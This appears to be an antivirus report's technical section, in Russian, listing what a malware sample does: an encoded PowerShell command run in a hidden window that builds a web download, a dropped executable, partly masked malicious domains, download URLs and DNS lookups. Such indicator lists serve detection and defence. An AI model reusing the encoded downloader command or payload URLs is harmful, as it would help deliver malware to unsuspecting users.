Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABJADQAMgBfADIAXwA1AD0AKAAnAGIAJwArACcAOQBfADkAMQAxACcAKQA7ACQASAA4ADMAXwAxAF8AXwA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAB1ADUAMwBfADYAXwAwAF8APQAoACcAaAB0AH...
- %HOMEPATH%\688.exe
- %HOMEPATH%\688.exe
- 'mo#####ngdothisonla.com':80
- '54.##5.153.237':80
- 'pe##onit.ru':80
- 'pe##onit.ru':443
- 'ba###tdancer.ru':80
- 'ba###tdancer.ru':443
- http://mo#####ngdothisonla.com/vehRqSLI0
- http://pe##onit.ru/dA6Oi9YKR3
- http://ba###tdancer.ru/y2KbwZBBtw
- 'pe##onit.ru':443
- 'ba###tdancer.ru':443
- DNS ASK mo#####ngdothisonla.com
- DNS ASK ga######orrepairparamus.com
- DNS ASK pe##onit.ru
- DNS ASK ba###tdancer.ru
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABJADQAMgBfADIAXwA1AD0AKAAnAGIAJwArACcAOQBfADkAMQAxACcAKQA7ACQASAA4ADMAXwAxAF8AXwA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAB1ADUAMwBfADYAXwAwAF8APQAoACcAaAB0AH...' (со скрытым окном)